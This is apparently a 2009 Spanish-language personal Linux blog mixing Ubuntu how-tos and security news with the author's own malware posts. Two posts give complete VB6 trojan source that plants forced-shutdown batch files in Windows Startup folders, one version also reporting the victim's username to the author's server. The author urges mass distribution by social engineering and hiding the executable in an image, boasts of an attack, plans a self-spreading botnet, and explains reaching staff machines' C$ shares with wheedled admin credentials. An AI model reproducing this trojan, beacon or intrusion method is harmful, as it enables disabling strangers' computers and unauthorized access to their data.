Como enviar troyanos masivos a una cuenta hotmail

Aqui les dejo un codigo de como mandar un monton de troyanos a una cuenta de hotmail, tambien lo pueden usar para otros fines.

Antes de elaborar este codigo deben tener en cuenta las siguientes entradas

como crear un troyano: http://fal254.blogspot.com/2009/08/como-hacer-un-troyano.html

como enviar correos desde una terminal: http://fal254.blogspot.com/2009/09/envia-correos-desde-tu-terminal-de.html

como enviar archivos a un correo desde una terminal: http://fal254.blogspot.com/2009/12/enviar-archivos-correos-desde-una.html

Ahora solo basta con seguir los pasos de este video:

Enviar archivos a correos desde una Terminal Linux

Yo uso mucho la terminal de linux, hago casi todo ahi, entonces si quieres enviar archivos a un correo solo basta con crear este script, para esto antes tienes que tener instalado algunos paquetes y configurar tu cuenta de correo como indica en este enlace.

Para crear el script para enviar archivos:

gedit send_files

Luego copiamos este codigo.

#!/bin/bash

echo ""

DESTINO=""

echo -n "Ingrese Destino(ej. fal@fal.com): "

read DESTINO

ASUNTO=""

echo -n "Ingrese asunto: "

read ASUNTO

RUTA=""

echo -n "Ingrese Ruta del Archivo(ej. /home/fal/): "

read RUTA

ARCHIVO=""

echo -n "Ingrese Nombre del arvhivo(ej. file.txt): "

read ARCHIVO

echo ""

echo "enviando..."

uuencode ${RUTA}${ARCHIVO} ${ARCHIVO} | mailx -s "${ASUNTO}" ${DESTINO}

echo ""

Si tienes conocimientos en programacion shell, puedes hacer modificaciones a tu antojo.

Luego dar permisos de ejecucion

sudo chmod +x send_files

Para ejecutar solo basta con digitar ./send_files

Hueco en red de win2

Como algunos saben en win2 existen muchos huecos que no han sido actualizados hasta el momento, estos son usados por hackers, para poder entrar a las redes privadas que un organizacion.

Esto quiere decir que si una empresa tiene una red local, desde cualquier terminal se podria acceder a los datos mas importantes de la organizacion, asi como alterar los datos, estos puedes ser de recursos humanos se pueden aumentar el saldo, cambiar las horas de ingreso, ver archivos privados etc..

Les hare una demostracion de como entrar a una red privada win2 de una empresa de manera facil y usando ing. social.

Primero llego a la empresa como consultor externo de sistemas, pido la clave de wifi para conectarme.

Por auditoria pido una cuenta de Administrador, me coneceto a una terminal cualquiera usando rdesktop

Ya estoy conectado desde una terminal de la red en mi laptop, ahora abro una consola win2 y digito net view, con este comando puedo ver todas las terminales conectadas, ahora si se que maquina es la de la asistenta de recursos humanos o la de su jefatura, le hago un ping al nombre para ver cual es la ip respectiva.

En algunas empresas ponen el nombre a las terminales segun el area. Luego de hacer ping obtenemos la ip, con esto basta, ahora en la misma consola windows digitamos explorer \\la_ip\c$ con este comando lo que logramos es entrar al directorio C:\\ de dicha terminal, si estamos ahi podemos ver el contenido de su Escritorio, de sus documentos, podemos copiar modificar, etc.

Si se tiene un poco mas de conocimiento en estas cosas, se puede acceder a la base de datos y poder hacer algunas jugadas.

Si eso es lo que hace un externo, no saben lo que puede hacer alguien que trabaje en la organizacion no necesariamente ser del area de TI o Sistemas solo usando Ing Social, los favores que puede hacer a la gente que tarabaja ahi y los beneficios que puede ganar, y sobre todo tener un control de todo el personal que trabaja ahi, ver fotos, videos, cartas, posibles fraudes,etc.

Asi que la seguridad en win2 apesta!!!

Usar la Tecla Win2 en Ubuntu

En el caso mio la forma de como se muestra es diferente ya que uso Ubuntu Remix, para que puedan activar el boton de win2 tan solo basta con ejecutar el siguiente comando en una terminal de linux.

gconftool-2 --set /apps/metacity/global_keybindings/panel_main_menu --type string "Super_L"

Regala Google Chrome en esta Navidad!!!

En esta navidad regala el navegador google chrome, tan solo entra a esta direccion http://www.givechrome.com/#/intro y de una manera facil y divertida envia el mejor regalo en esta navidad =).

Por fin Google Chrome en Linux

Por fin despues de mucho tiempo de espera los usuario de Linux podran usar el famoso explorador Google Chrome, lo podran bajar de la pagian de google e instalar de una manera facil.

Para Linux aun esta en su version beta, sera cuestion de probarlo y haber como anda.

Baja mp3 de Youtube desde Ubuntu

Desde hace tiempo que descargo musica mp3 de youtube pero aveces las paginas q me brindan ese servicio no estan disponibles, no me gusta usar programas de escritorio para bajar mp3 de youtube, entonces me decidi a crear mi propio script para bajar mp3 de los video que mas me gustan de dicha pagina desde cualquier terminal linux.
Aqui les dejo mi script muy facil de modificar y de ejecutar:

Primero instalen estos dos paquetes:

sudo apt-get install ffmpeg

sudo apt-get install youtube-dl

ahora les dejo mi codigo de nombre downloadyoutube

#!/bin/bash

CODIGO=""
echo -n "Ingrese Codigo: "
read CODIGO

NOMBRE=""
echo -n "Ingrese Nombre para el mp3: "
read NOMBRE

echo ""
echo "empezado la descarga..."
echo ""

youtube-dl http://www.youtube.com/watch?v=${CODIGO}

echo "convert to mp3"
echo ""

ffmpeg -i ${CODIGO}.flv -f mp3 -vn -acodec copy ${NOMBRE}.mp3

echo "eliminando *.flv"

rm ${CODIGO}.flv

echo ""
echo "moviendo a /home/fal/mp3/ *.flv"
echo ""

mv ${NOMBRE}.mp3 /home/fal/mp3/

echo "el proceso termino..."
echo ""

Despues lo guardan y le dan el permiso de ejecucion:

sudo chmod +x downloadyoutube

Y para ejecutarlo:

./downloadyoutube

Cuando lo ejecuten colocan el Codigo de video por ejemplo asi:

http://www.youtube.com/watch?v=a8xTsborcUw

Codigo: a8xTsborcUw
Nombre: aqui_va_un_nombre_para_el_mp3

Win2 Apesta..pero parece que en la URP no!! :s

Parece que en mi universidad la gente esta confundida...hay un curso que se llama derecho informatico..y todos los grupos hicieron un proyecto solo de consultas simples, en .net, ms-sql, vaya y que ninguno funcionaba correctamente..jaja..ademas que lo corrian desde visual studio...vaya presentacion :p...la gente si q es cerrada solo se amarra a una sola cosa...bueno yo tambien manejo de una manera avanzada .net y ms-sql...pero para este caso..usare algo ligero y rapido como php y mysql...bueno me voy a continuar con mi trabajo...

Converitir archivos de texto a formato UTF-8

Otra vez mil aplausos para linux, me saca de apuros...tenia un trabajo de la universidad, tenia mas de mil archivos de texto hechos por un amigo en win2 ;(...y cuando queria leer esos archivos de texto desde php usando el apache las tildes se transformaban en otro caracter, aun asi cambiando el formato desde html, nada...entonces lo que se me ocurrio fue cambiar el formato que tenian ISO-8859-15 a UTF-8 que seria el correcto para no tener esos problemas entonces buscando en internet junte varias cosas y genere este script:

#!/bin/bash

for file in `ls`

do

iconv -f ISO-8859-15 -t UTF-8 -o "new_$file" "$file"

done

copienlo tal como esta...yo lo llame script.sh luego tienen q darle permiso de ejecucion asi:

sudo chmod -x script.sh

luego lo corren en el mismo directorio de esta manera:

sudo ./script.sh

noten..que se tiene que generar un nuevo archivo por que si ponen el mismo nombre se eliminara el contenido.

Muy feliz con ubuntu remix...

Como ven me siento muy comodo usando ubuntu remix...puedo hacer de todo...hackear..crear demonios, etc y alistandome para crear mi primer botnet..aki les dejo unas pantallas de como es mi entorno.

A buen entendedor pocas palabras

Un gusano ataca a los iPhone

El primer gusano en infectar el teléfono celular iPhone, de Apple, fue descubierto al propagarse en Australia. Los expertos temen ver más ataques en el futuro.

El programa cambia el fondo de pantalla tradicional del iPhone por una fotografía de Rick Astley, un cantante inglés de la década de los 80, con el mensaje "ikee nunca se te va a abandonar".

El gusano, conocido como ikee, sólo afecta a los teléfonos desbloqueados (o jail broken), en los que el usuario ha eliminado los mecanismos de protección de Apple para permitir que el aparato pueda ejecutar cualquier software.

Los expertos dicen que el gusano no es dañino, pero que podrían aparecer variantes más maliciosas.

"El creador del virus ha publicado el código fuente completo de las cuatro variantes existentes del gusano", escribió Mikko Hypponen de F-Secure, una empresa de seguridad.

"Esto significa que pronto habrá más virus que podrían tener una carga más desagradable que simplemente cambiar el fondo de pantalla", agregó.

Entrada 20091108

Ubuntu Remix en mi LapTop

Cuando vi los nuevos sistemas operativos para NetBooks, me parecieron excelentes, por su diseño, su nueva forma de como ver las ventanas, ademas que no consumen mucho recursos ya sea de memoria o procesador, entonces me decidi a instalar en mi Laptop Acer Aspire 5050 el nuevo Ubuntu Remix 9.10, antes de eso lo probe y de maravilla, me reconocio la tarjeta inalambrica, el sonido, video.

Los iconos de las ventanas que vas abriendo se van agrupando arriba en el panel, y solo te muestran los logos de los programas q estan abiertos.

España, primera en redes de bots

Según los datos recogidos por PandaLabs, el laboratorio de Panda Security, The Cloud Security Company, durante el mes de octubre, España encabeza el ranking (con un 44,49% del total) de ordenadores infectados por bots, software que una vez introducido en el PC sirve para que los hackers tomen control remoto del mismo y puedan realizar diferentes acciones, como el envío de spam, de virus, gusanos y troyanos, etc.


Le sigue muy por debajo Estados Unidos, con un 14,41%; México, con un 9,37, y Brasil, que baja a un 4,81%. Entre los países menos infectados figura Perú, Holanda y Suecia, con ratios por debajo del 1%. Los datos han sido extraídos de los usuarios que han utilizado la utilidad gratuita Panda ActiveScan durante el mes de octubre y cuyos resultados han encontrado infecciones causadas por alguna de las diferentes familias y variantes de bots.



Estas redes de bots las crean los hackers para utilizarlas con diferentes fines. Entre ellos, para el envío de spam o la distribución de virus. En nuestro país, Madrid encabeza el ranking de ciudades con ordenadores infectados que están enviando spam, con un 25,92%; seguido por Barcelona, con un 15,52%, y Sevilla, con un 6,06%. Según Luis Corrons, director técnico de PandaLabs, “junto a los falsos antivirus, las redes de bots o de ordenadores zombies están registrando un aumento considerable del más del 30% en lo que llevamos de año. Es la forma más sencilla para un hacker de utilizar estos PCs para distribuir spam o malware, y de esta manera hacer mucho más complejo su rastreo y detección. El problema es que los usuarios están incurriendo en un delito sin saberlo, y muchas veces se pueden encontrar con problemas como corte de comunicaciones por parte de su ISP, denuncias, etc.”.

Java is Everywhere

Ubuntu Remix

Ubuntu Netbook Remix es una versión Ubuntu, optimizada a computadoras portátiles de pequeñas dimensiones llamadas netbooks. El sistema está adaptado a las pantallas reducidas y las arquitecturas Intel Atom de estos equipos portátiles.

Forma parte de la familia de sistemas operativos Ubuntu (de núcleo Linux), creados y soportados por la empresa Canonical Ltd.

Ventajas de la versión

Rapidez ya que fue concebido para la plataforma Intel Atom. Necesita poco espacio de disco duro (4 gb aprox). Interfaz pensada en la restricción de las pantallas. Seguridad, frente a la creciente amenaza de virus. Gran cantidad de colaboradores y personas que participan con la plataforma.

Requerimiento minimos

* Procesador: Intel® Atom™ processor
* RAM: 512 MB
* 4 GB Flash disk (SSD) o disco duro

Software

* Web browser - Firefox 3
* E-mail - Evolution
* Instant messenger - Pidgin
* Media player - Rhythmbox
* eBook reader - FBReader
* Photo viewer - F-Spot
* Office suite - OpenOffice.org

Aplicaciones en opción

* Adobe Flash
* Adobe Reader
* Java JVM
* Skype
* MPEG4 (H.263)
* MP3
* AAC
* Windows Media

Hacker se suicida al ser detenido por extorsión

Hacker alemán de 20 años de edad se quitó la vida en su celda después de haber sido detenido por intento de extorsión.

El joven hacker, oriundo de la ciudad alemana de Erlanger, había intervenido el sistema de SchulerVZ, comunidad social similar a Facebook, apropiándose de los datos personales de más de un millón de usuarios. Posteriormente, intentó extorsionar a la empresa VZ a pagarle € 80 000 para recuperar los datos robados.

Con sus 15 millones de afiliados, SchulerVZ es usada principalmente por niños y jóvenes para servicios de chat e intercambio de fotografías.

El 20 de octubre, el joven fue detenido en las oficinas de VZ, cuando se disponía a cobrar la extorsión. Después de su detención, fue trasladado en régimen de prisión preventiva a Berlín. La mañana del sábado 31 de octubre fue encontrado ahorcado en su celda.

El joven, que había trabajado como programador, ya tenía antecedentes policiales. De hecho, distaba mucho de tener un comportamiento discreto. Para intervenir SchulerVZ usó, de hecho, un programa desarrollado por el mismo, que en mayo de 2009 demostró en un vídeo en YouTube.

En el vídeo en cuestión, el joven hacker mostraba la forma de conectarse a un servidor obtener información de manera ilícita.

El 20 de octubre, se presentó en las oficinas de VZ para cobrar los 80 000 euros, luego de amenazar a la gerencia de la empresa que vendería los datos a Europa del este en caso de no recibir el pago.

La empresa SchulerVZ publicó una declaración pública en su blog, donde lamenta el desenlace de la situación, expresando palabras de apoyo y condolencias a los familiares del suicida.

Fuente: Heise Online.

Arma tu alarma en Ubuntu

Ahora que estoy en tiempo de examenes necesito levantarme para empezar a estudiar en las madrugadas..Entonces me decidi a programar mi propio demonio en Linux para que se ejecute a ciertas horas estos son los pasos que tienes que seguir:

Instalas xmms2 desde los repositorios, en este caso este paquete nos servira para ejecutar el archivo de audio que queramos que se reproduzca.

sudo apt-get install xmms2

Vamos a crear un directorio para guardar nuestro demonio y nuestro archivo de audio. Copiar con permisos de root en ese directorio tus *.mp3 o si tienes otros archivos de audio para que se ejecuten

sudo mkdir /home/demonio/alarma/

Ahora vamos a crear nuestro demonio

sudo nano /home/demonio/alarma/despertador

Esto digitamos en nuestro archivo

xmms2 clear
xmms2 radd /home/demonio/alarma/
xmms2 play

for ((i = 1; i <= 100; i++)) do amixer sset Master playback $i% sleep 5s done

Ahora creamos este archivo para parar el despertador

sudo nano /home/demonio/alarma/parardespertador

Esto digitamos en este archivo

kill `ps -A | grep "xmms2" | cut -c1-5`
kill `ps -A | grep "despertador" | cut -c1-5`
amixer sset Master playback 60%

Luego damos los permisos de ejecucion

sudo chmod +x /home/demonio/alarma/despertador

sudo chmod +x /home/demonio/alarma/parardespertador

Ahora para decirle en que momento queremos que se ejecute usamos CronTab
Digitamos en una terminal

crontab -e

Una abierto el archivo digitamos la programacio

30 17 * * * /home/demonio/alarma
0 8 * * 1 /home/demonio/alarma
0 9 * * 3 /home/demonio/alarma

En este caso la alarma sonara todos los dias a las 17:30 hs, ademas los Lunes a las 8:00 hs y los miercoles a las 9:00 hs.

Ubuntu 9.10 Trailer

Camaras Digitales en GNU/Linux

Para todos aquellos que tuvieron problemas en conectar su moderna Camara Digital en su pc con Ubuntu al igual que yo, entonces la solucion al problema es actualizar tu version, para esto te vas a Sistema > Administracion > Gestor de Actualizaciones


Le das en el boton Instalar Actualizaciones esperas un rato y listo ahora te va a reconocer sea la marca que sea.

Por lo contrario si no quieres actulizar todo solo basta con instalar estas librerias:

fal@LapFaL:~$ sudo apt-get install libgphoto2-2
fal@LapFaL:~$ sudo apt-get install libgphoto2-port0

Botnet

Una vez analizado el funcionamiento que va a tener el botnet, voy a empezar a desarrollarlo pero después que termine el ciclo de estudio, en vacaciones estaré probando y lanzando masivamente este botnet tal como hice con el troyano pero esta vez los mismos botnets se encargaran de propagarse y crear mas botnets :)

Tuquito

Tuquito 3 es una nueva distribucion GNU/Linux muy interesante en lo personal ya la probe y la experiencia de usuario es buena.

Algunas características de Tuquito son:

• Detección automática de los discos rígidos en su PC, dejándolos disponibles en su escritorio con tan solo un clic.
• Soporte de todas las impresoras de modelos, antiguos y nuevos, disponibles en el mercado.
• Soporte de escáners.
• Soporte de webcams, incluyendo los modelos de intel y genius.
• Permite acceder a CDROMs, diskettes, con tan solo un clic en su escritorio.
• Detección automática de cámaras digitales, pendrive, dispositivos hot plugs.
• Es compatible con archivos de MSOFFICE y soporta los sistemas de archivos de Microsoft Windows (NTFS y FAT32).
• Bootea desde pendrive o desde CD.
• Corre sin problemas en netbooks
• Soporte para placas Broadcom
• Soporte para formatos ext4
• Soporte para mp3 y codecs de video
• Soporte para modems ADSL
• APTITO: acelerador de descarga para APT

http://www.tuquito.org.ar/

Frase

Uno necesita estar rodeado de muchos ceros para ser el numero uno del grupo, pero lo que no sabe uno que le falta mucho para llagar a nueve y tal vez el tiempo ya no te alcance, mientras que te crees el numero uno los demás están llegando a ser nueve gracias a ti.

Descubierto el primer Botnet de Servidores Web Linux

Un investigador ruso descubrió un clúster de servidores Linux infectados y convertidos en un botnet para distribuir malware a navegantes desprevenidos usando Windows. Se trataría del primer botnet de servidores web conectados con un centro de control común para distribuir software malicioso que, en adición, estaría conectado a otro botnet de computadoras personales.

Cada uno de los servidores infectados, dedicados o virtuales, ejecuta un servidor web Apache legítimo en el puerto 80, pero además también otro servidor nginx furtivo en el puerto 8080 que distribuye el malware con ayuda de proveedores de servicios de DNS dinámicos como DynDNS y No-IP.

Con sólo 100 nodos el botnet es relativamente pequeño, por lo que todavía no está claro cuáles son las intentenciones reales de sus creadores. Denis Sinegubko, quien realizó el descubrimiento, se aventura a conjeturar que:

“Probablemente es algún tipo de prueba de concepto para los hackers. O tal vez tienen muchos más servidores comprometidos esperando por su turno”.

Gracias a VivaLinux

Melissa

Se acuerdan del virus llamado Melissa que hace años fue el mas sonado, y fue escrito en vb 6.0 usando las macros de office, este codigo me dio inspiacion para hacer el troyano que entradas anteriores realice, aqui te dejo el codigo fuente esta tal cual fue ejecutado.

http://m4dch4t.effraie.org/vxdevl/vxsrc/MS-Dos/melissa.txt

Entonces que opinas muy bueno no?? e inspirador....

Envia correos desde tu terminal de Ubuntu

Cuando estoy en el trabajo o en la universidad necesito mandar correos de una forma facil y sobre todo rapida cuando estoy con mi laptop, el problema era que cuando tenia que logearme al servidor de correos y esperar que cargue me demoraba y si aun estoy con la bateria baja es un consumo de energia adicional abrir el mozilla, entonces lo que hice fue agregar mi cuenta de Gmail a mi laptop de la siguiente manera:

En una terminal

fal@LapFaL:~$ sudo apt-get install ssmtp
fal@LapFaL:~$ sudo apt-get install mailutils

despues configurar los siguientes achivos

fal@LapFaL:~$ sudo nano /etc/ssmtp/ssmtp.conf

• root=usuario@gmail.com
• mailhub=smtp.gmail.com:587
• hostname=usuario@gmail.com
• FromLineOverride=YES
• UseSTARTTLS=YES
• AuthUser=usuario
• AuthPass=pass

fal@LapFaL:~$ sudo nano /etc/revaliases

• root:usuario@gmail.com:smtp.gmail.com:587
• user:usuario@gmail.com:smtp.gmail.com:587

en user va el nombre del usuario con que te logeas

Y listo ya lo tienes con este comando puedes mandar mensajes a cualquier tipo de correo

fal@LapFaL:~$ echo "mensaje" | mail -s "asunto" usermail@mail.com

Pero si quieres mandar tus mensajes asi...
...entonces sigues estos pasos que elabore

fal@LapFaL:~$ sudo nano /usr/bin/falmail

#!/bin/bash

TO=""
echo -n "para: "
read TO

SUBJECT=""
echo -n "asunto: "
read SUBJECT

MSJ=""
echo -n "mensaje: "
read MSJ

echo "${MSJ}" | mail -s "${SUBJECT}" ${TO}

echo "enviado a ${TO} correctamente.... "

Luego le damos permisos de ejecucion

fal@LapFaL:~$ sudo chmod +x /usr/bin/falmail

y tan solo basta que digites falmail y listo tienes lo mismo que viste en la imagen.

Como hacer un troyano

En el video anterior use este troyano pero le quite el mensaje que sale al ejecutar el troyano, cambie el mensaje para realmente se entienda el motivo de este y la pagina que abre que solo fue para la demostracion y me di cuenta que no vale dejar huellas.

No voy a explicar como funciona, si estas interesado tienes que leer todo el codigo probarlo hacer las modificaciones que quieras, y sobre todo llegar a usarlo pero no para una sola persona usa la ing. social y manda a cantidades de personas y si estas te ayudan a propagarlo seria mucho mejor.

Para que entiendas este codigo debes conocer lo siguiente:

1. Php
2. MySql
3. VB60
4. Comandos en cmd de windows

Entonces con esto podras hacer cambios a tu antojo.

Public Sub crea_archivo(ByVal url as String, ByVal cont as String)
On Error Goto fallo1
Dim obj as Object
Dim fi as Object
Dim vararray as Variant
vararray = Array(cont)
Set obj = CreateObject("Scripting.FileSystemObject")
Set fi = obj.CreateTextFile(url)
fi.writeline vararray(0)
fi.close
fallo1:
'no hace ni mierda
End Sub

Private Sub Form_Load()

'para server 2003 en ingles
Call crea_archivo("C:\Documents and Setings\All User\Start Menu\Programs\Startup\text2.bat", "msg * PORQUE USAS WINDOWS????")
Call crea_archivo("C:\Documents and Setings\All User\Start Menu\Programs\Startup\text.bat", "shutdown -f")

'para windows vista
Call crea_archivo("C:\Documents and Setings\All User\Start Menu\Programs\Startup\text2.bat", "msg * PORQUE USAS WINDOWS????")
Call crea_archivo("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\text.bat", "shutdown -f")

'para windows xp
Call crea_archivo("C:\Documents and Setings\All User\Start Menu\Programs\Startup\text2.bat", "msg * PORQUE USAS WINDOWS????")
Call crea_archivo("C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\text.bat", "shutdown -f")

'para guardar el nombre del ususario en mi hosting y tener un registro de los afectados
Call crea_archivo("C:\fal254_host.bat","start http://fal254.my-host/list/jaja/verpass.php?name=%USERNAME%")

Call crea_archivo("C:\fal254_sesion.bat","shutdown -f")

Shell("C:\fal254_host.bat")

Shell("C:\fal254_sesion.bat")

End Sub

Ahi te dejo este codigo hecho el vb60 lo bueno de este lenguaje de programacion es que para ejecutarlo en windows no se necesita de ningun framework ni librerias.

Se que al dejar este codigo muchos conservadores estaran planeando una solucion(que si existe sin necesidad de formatear la pc pero la mayoria no sabe...) para este pequeño grupo que esta tratando aparte de crear un tipo de "proteccion" ya sea con un programa,buenas practicas, o pasando la voz yo estare creando otro tipo de troyano muy diferente al anterior y la forma de como enviarlo, asi que manos a la obra....

FAL: Ataque masivo con Troyano

Entradas atras habia escrito como crear un troyano, bueno hice algunas modificaciones y el resultado fue muy bueno para ser el primer Ataque, un valor agregado q le di a mi troyano fue cuando se ejecute que me guarde el nombre del usuario y la PC del mismo y mandarlo a mi servidor y yo pueda ver un registro de los afectados.


No se preocupen que les voy a dejar mas adelante el codigo fuente para que puedan modificarlo y/o mejorarlo.

JoliCloud

JoliCloud es un Sistema Operativo Linux asi como las diferentes distribuciones que existen, aun esta en pruebas alpha pero disponible para que puedas usarlo.

Con una interfaz moderna se adapta a las redes sociales de moda, se puede decir que es una nueva generacion de sistemas operativos tomando como base al internet osea no se necesita de un equipo veloz y potente de gran capacidad de almacenamiento ya que todo depende de Internet.

Aqui te dejo la pagina oficial www.jolicloud.com puedes descargarlo y vivir una nueva experiencia.

Creando un troyano

Hola, aqui les dejo un codigo realizado con VB6 por desgracia, pero para ejecutarlo no se necesita tener frameworks como para ejecutar .net, etonces es facil de crear un ejecutable y enviar a alguien q use windows y destruir su PC.

Empezamos:

Creas un nuevo proyecto en VB, si no sabes buscas en internet...

Una vez creado, escribimos el siguiente codigo para el formulario

Public Sub crea_archivo(ByVal url As String, ByVal cont As String)
On Error GoTo fallo1
Dim obj As Object
Dim fl As Object
Dim vararray As Variant
vararray = Array(cont)
Set obj = CreateObject("Scripting.FileSystemObject")
Set fl = obj.CreateTextFile(url)
fl.writeline vararray(0)
fl.Close
fallo1:
End Sub


Private Sub Form_Load()
'para server 2003 en ingles
Call crea_archivo("C:\Documents and Setings\All User\Start Menu\Programs\Startup\text.bat", "shutdown -f")

'para windows vista
Call crea_archivo("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\text.bat", "shutdown -f")

'para windows xp
Call crea_archivo("C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\text.bat", "shutdown -f")
End Sub

Copias y pegas el codigo anterior, y generas un ejecutable es muy facil en este tipo de tecnologias viejas generar un .exe es muy simple vas a archivo(no estoy tan seguro del nombre es la primera opcion del menu) luego hay una opcion q dice generar ejecutable o algo asi le das ahi y pones el nombre del ejecutable .exe

Mismo caballo de troya vamos a esconder a nuestro ejecutable en una inocente imagen, luego para q la victima lo reciba usa Ingenieria Social.

Disfruta este juguete y pruebalo, modifica y comparte tus nuevos cambios

Watchitoo

Un nuevo panorama para las redes sociales, crea un show pon un video y compartelo en linea con tus amigos o con desconocidos, pon tu camara web para q te puedan ver y tu a ellos y ten una conversacion con microfono o mediante el chat, pruebalo y vive una nueva manera de cominicacion.

HOWCAST

En estos tiempos de Crisis no nos conviene pagar a terceros para realizar algunas tareas del hogar o diferentes servicios, en esta pagina encontraras manuales para realizar diferentes actividades como crear tu propia alarma para tu casa, hacer una limpieza a tu laptop, como tambien ahorrar energia electrica.

Entrada 20090809

Twitter en una Terminal de Ubuntu

Si eres uno de esos usuarios que se siente mas comodo usando la terminal de linux asi como yo entonces aqui te dejo un nuevo juguete para que lo uses y si te gusta lo modificas a tu antojo siguiendo la filosofia del software libre.

Aqui te dejo dos scripts, el primero si te gusta compartir la maquina con tus amigos o tienes mas de un usuario en twitter y el segundo para los que usan y no prestan a nadie su pc o tienen un solo usuario en twitter.
Este script lo guardas con cualquier nombre por ejemplo twitter y le das permiso de ejecucion asi: sudo chmod 777 twitter, y para ejecutarlo de las asi: ./twitter

#!/bin/bash
USUARIO=""
echo -n "Usuario: "
read USUARIO
PASS=""
echo -n "Password: "
read PASS
MSJ=""
echo -n "Mensaje: "
read MSJ
echo "actualizando..."
curl -u ${USUARIO}:${PASS} -d status="${MSJ}" http://twitter.com/statuses/update.xml

El segundo script, lo vamos a crear en /usr/bin y le damos permisos de ejecucion asi: sudo chmod +x /usr/bin/twitter y para ejecutarlo solo digitar estes donde estes: twitter

#!/bin/bash
MSJ=""
echo -n "Mensaje: "
read MSJ
echo "actualizando..."
curl -u tu_usuario:tu_password -d status="${MSJ}" http://twitter.com/statuses/update.xml

Modificalo a tu antojo y compartelo con los demas

Codigo Linux - Documental

Al encontrar este documental en la red me motivo a seguir usando GNU/Linux y a seguir haciendo lo que mas me apasiona, espero que les sirva y que lo disfruten hasta ahora el mejor documental de informatica que he visto...disfruten sus 5 capitulos

Instalar OpenOffice 3.1

En la ultima version de Ubuntu te viene una version no tan completa del OpenOffice 3.1, si quieres tener todas las nuevas caracteristicas es tan facil, bueno primero se descargan la version en el idioma que ustedes quieran luego ese comprimido lo guardan de preferencia en su Carpeta Personal y lo descomprimen, ojo: antes de seguir deben tener instalado sun-java6-jdk.

Abren una terminal y se ubican en la nueva carpeta que se genero cuando descomprimieron el OpenOffice llama DEBS, una vez ahi digitan:

Con esto estamos eliminado la version anterior instalada.

sudo apt-get -y remove openoffice.org openoffice.org-base openoffice.org-calc
openoffice.org-common openoffice.org-core openoffice.org-draw openoffice.org-evolution
openoffice.org-filter-mobiledev openoffice.org-gnome openoffice.org-gtk
openoffice.org-help-en-us openoffice.org-impress openoffice.org-java-common
openoffice.org-l10n-common openoffice.org-l10n-en-gb openoffice.org-l10n-en-za
openoffice.org-math openoffice.org-style-human openoffice.org-writer

Instalamos todos los paquetes debs

sudo dpkg -i *.deb

Entramos a desktop-integration y otra ves digitamos lo anterior.

Videos para MP4

El otro dia mi hermana me pidio que le ayude con su mp4 ya que el cd para convertir los videos al formato *.amv se habia roto y asi que en su win2 xp ya no podia convertir sus videos, asi que me decidi ayudarla, fue facil lo primero que hice fue bajar este ejecutable amv-ffmpeg-linux-i386-20071030
luego cambiar su estado como ejecutable dando click derecho propiedades, despues gurdar ese ejecutable en un directorio.

luego de haber bajado los videos *.mp4 de youtube, empezamos abriendo una terminal y digitamos lo siguiente:
En el mismo directorio donde esta el ejecutable guardamos el video (video.mp4)

fal@LaPFaL:~$ mencoder video.mp4 -ovc lavc -vf scale=352:288 -oac lavc -o salida.mpg

luego al tener el nuevo video(salida.mpg)

fal@LaPFaL:~$ ./amv-ffmpeg-linux-i386-20071030 -i salida.mpg -f amv -s 160x128 -r 16 -qscale 2 -mbd 2 -g 1 -ac 1 -ar 22050 final.amv

y al final borramos los *.mp4 y *.mpg y nos quedamos con *.amv

Y asi ya pudo bajar mas videos para su mp4, esta vez los videos se ven pantalla completa y el sonido es mucho mejor cosa que no hacia con sus drivers en win2 xp :p

Y si tenemos otro formato haremos lo siguiente:

fal@LaPFaL:~/grabaciones$ mencoder -idx input.ogv -ovc lavc -oac mp3lame -o output.avi

Actualizar FireFox 3.5 en Ubuntu

Si lo que buscas es actualizar a la versión 3.5 de Firefox (Code Name: Shiretoko), deberás seguir los pasos que a continuación se enumeran.

Desde la terminal abrimos el listado de Sources:

sudo gedit /etc/apt/sources.list

Una vez abierto agregamos la linea correspondiente a nuestra versión de Ubuntu:

deb http://ppa.launchpad.net/fta/ubuntu karmic main
deb http://ppa.launchpad.net/fta/ubuntu jaunty main
deb http://ppa.launchpad.net/fta/ubuntu intrepid main
deb http://ppa.launchpad.net/fta/ubuntu hardy main


Guardamos y seguido de ello actualizamos:

sudo apt-get update

En caso de que nos de un error como este :

W: Error de GPG: http://ppa.launchpad.net intrepid Release Las firmas siguientes no se pudieron verificar porque su llave pública no está disponible: NO_PUBKEY 632D16BB0C713DA6
W: Tal vez quiera ejecutar 'apt-get update' para corregir estos problemas

Lo que debemos es ingresar la llave pública.

gpg --keyserver keyserver.ubuntu.com --recv 632D16BB0C713DA6
gpg --export --armor 632D16BB0C713DA6 | sudo apt-key add -

Una vez actualizado, instalamos:

sudo apt-get install firefox-3.5

Con ello tendremos listo la versión de Firefox número 3.5 (Shiretoko) instalada, si todo nos sale correctamente.

Arma tu propio Ventilador usb

Materiales

1. 1 Plug USB macho con cable de 4 vías de la longitud necesaria
2. Un motor de Corriente Continua, que funcione bajo las especificaciones del puerto USB*.
3. 2 CD’s o DVD’s
4. Un tubo de cartón (tubo de Papel higiénico).
5. Aislantes: cinta, silicona, etc.

*Detalles sobre el puerto USB: Trabaja a 5 V, 100 mA y 2.5 Watts.

Auto-NDISwrapper

Pues muchos de nosotros nos vemos en la necesidad de usar Ndiswrapper junto con los drivers de nuestra tarjeta wireless, esto debido a uno de los grandes problemas con los que se encuentra el software libre, que es el código cerrado y la no publicación de las especificaciones de hardware.
En su momento ya hablé de ndiswrapper, pero esta vez se trata de Auto-NDISwrapper una aplicación basada en python que tiene como objetivo hacer más fácil el uso de esa aplicación, en especial a aquellos usuarios que son nuevos en cualquier distro Linux y en su vida han usado la Terminal o por lo menos sabían que existía.
Las funciones de Auto-NDISwrapper son:

1. Detectar tu tarjeta de Internet inalámbrico.
2. Desactivar cualquier driver (provisional) que haya sido instalado durante la instalación del SO.
3. Descargar el driver de Windows para tu tarjeta de red (Obviamente necesitarás una red cableada o algo parecido para el acceso a Internet).
4. Instalar el driver y que tengas una red inalámbrica funcional.

• Descarga e Instalación

Descarga la versión 0.1 (17/07/08), del siguiente enlace, si lees esto en fechas más adelante visita el sitio web para comprobar actualizaciones.

|Descarga: Auto-NDISwrapper 0.1

1. Descomprime el archivo que descargaste.
2. Mueve o copia las carpetas resultantes en tu directorio personal (/home/tu_usuario)
3. Abre una Terminal y ejecuta:
   sudo python ~/Auto-NDIS-0.1/auto-ndis.py
